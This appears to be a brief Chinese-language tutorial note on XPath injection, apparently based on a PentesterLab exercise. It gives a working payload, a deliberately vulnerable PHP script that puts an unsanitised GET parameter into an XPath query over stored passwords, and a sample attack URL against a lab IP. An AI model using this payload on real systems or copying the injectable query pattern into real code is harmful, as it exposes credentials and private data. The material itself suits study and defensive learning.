XPATH注入

POC:

'] | //*| //*['
类似于
' or ''='
管道符号(|)用于表示或操作,左斜线和一个星号(//*)代表所有节点


示例:

<?php 
  $x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";

  $xml=simplexml_load_string($x);
  $xpath = "users/user/name[.='".$_GET['name']."']/parent::*/message";
  $res = ($xml->xpath($xpath));
  while(list( ,$node) = each($res)) {
    echo $node;
  } 
?>
payload:
http://192.168.22.173/xml/example2.php?name='] | //*| //*['
相当于:
$xpath = "users/user/name[.=' '] | //*| //*[' ']/parent::*/message";
title